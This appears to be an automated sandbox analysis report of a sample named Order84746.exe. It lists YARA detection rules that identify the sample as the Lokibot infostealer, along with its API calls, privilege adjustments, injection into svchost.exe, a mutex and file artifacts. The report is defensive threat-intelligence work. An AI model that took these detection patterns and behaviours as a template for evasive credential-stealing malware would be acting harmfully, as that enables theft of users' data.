              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 3300, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_008E3D19
              Source: Order84746.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
              Source: Order84746.exe, 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_87013436-3
              Source: Order84746.exe, 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_8039831c-3
              Source: initial sample | Static PE information: Filename: Order84746.exe
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E3742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow | 0_2_008E3742
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009500AF NtdllDialogWndProc_W | 0_2_009500AF
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00950133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W | 0_2_00950133
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0095044C NtdllDialogWndProc_W | 0_2_0095044C
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094E9AF NtdllDialogWndProc_W,CallWindowProcW | 0_2_0094E9AF
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FAAFC NtdllDialogWndProc_W | 0_2_008FAAFC
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FAB4F NtdllDialogWndProc_W | 0_2_008FAB4F
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094EC7C NtdllDialogWndProc_W | 0_2_0094EC7C
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W | 0_2_0094EEEB
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W | 0_2_0094F1D7
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FB11F NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W | 0_2_008FB11F
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F2D0 SendMessageW,NtdllDialogWndProc_W | 0_2_0094F2D0
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FB385 GetParent,NtdllDialogWndProc_W | 0_2_008FB385
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W | 0_2_0094F351
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F5AB NtdllDialogWndProc_W | 0_2_0094F5AB
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F5DA NtdllDialogWndProc_W | 0_2_0094F5DA
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient | 0_2_008FB55D
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F689 ClientToScreen,NtdllDialogWndProc_W | 0_2_0094F689
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F609 NtdllDialogWndProc_W | 0_2_0094F609
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F654 NtdllDialogWndProc_W | 0_2_0094F654
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F7C3 GetWindowLongW,NtdllDialogWndProc_W | 0_2_0094F7C3
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0094F7FF
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FB715 NtdllDialogWndProc_W | 0_2_008FB715
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00FA3540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess | 1_2_00FA3540
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00FA33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode | 1_2_00FA33C0
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00FA2720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx | 1_2_00FA2720
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00926685: CreateFileW,DeviceIoControl,CloseHandle | 0_2_00926685
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0091ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746D5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle | 0_2_0091ACC5
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_009279D3
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0090B043 | 0_2_0090B043
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0091410F | 0_2_0091410F
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009002A4 | 0_2_009002A4
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0091038E | 0_2_0091038E
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008EE3B0 | 0_2_008EE3B0
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009006D9 | 0_2_009006D9
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0091467F | 0_2_0091467F
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094AACE | 0_2_0094AACE
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00914BEF | 0_2_00914BEF
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0090CCC1 | 0_2_0090CCC1
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E6F07 | 0_2_008E6F07
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008EAF50 | 0_2_008EAF50
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009431BC | 0_2_009431BC
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0090D1B9 | 0_2_0090D1B9
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FB11F | 0_2_008FB11F
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008F3200 | 0_2_008F3200
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0090123A | 0_2_0090123A
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0091724D | 0_2_0091724D
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009213CA | 0_2_009213CA
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E93F0 | 0_2_008E93F0
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FF563 | 0_2_008FF563
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E96C0 | 0_2_008E96C0
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0092B6CC | 0_2_0092B6CC
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E77B0 | 0_2_008E77B0
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0094F7FF | 0_2_0094F7FF
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009179C9 | 0_2_009179C9
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FFA57 | 0_2_008FFA57
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E9B60 | 0_2_008E9B60
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008F3B70 | 0_2_008F3B70
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E7D19 | 0_2_008E7D19
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00909ED0 | 0_2_00909ED0
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FFE6F | 0_2_008FFE6F
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E7FA3 | 0_2_008E7FA3
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_011DC248 | 0_2_011DC248
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040549C | 1_2_0040549C
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004029D4 | 1_2_004029D4
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00FA2720 | 1_2_00FA2720
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0041219C appears 45 times
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00405B6F appears 42 times
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: String function: 00906AC0 appears 42 times
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: String function: 0090F8A0 appears 35 times
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: String function: 008FEC2F appears 68 times
              Source: Order84746.exe, 00000000.00000003.1675657454.0000000003C3D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Order84746.exe
              Source: Order84746.exe, 00000000.00000003.1674814255.00000000039E3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Order84746.exe
              Source: Order84746.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 3300, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Order84746.exe  Static PE information: Section: UPX1 ZLIB complexity 0.9887223718424963
Source: classification engine  Classification label: mal100.troj.spyw.evad.winEXE@3/4@0/1
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0092CE7A GetLastError,FormatMessageW,0_2_0092CE7A
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0091AB84 AdjustTokenPrivileges,CloseHandle,0_2_0091AB84
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0091B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0091B134
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0092E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0092E1FD
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00926532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00926532
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0093C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0093C18C
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_008E406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008E406B
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_00FA3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00FA3360
Source: C:\Windows\SysWOW64\svchost.exe  File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06
Source: C:\Windows\SysWOW64\svchost.exe  Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\Order84746.exe  File created: C:\Users\user\AppData\Local\Temp\aut3820.tmp
Source: C:\Users\user\Desktop\Order84746.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
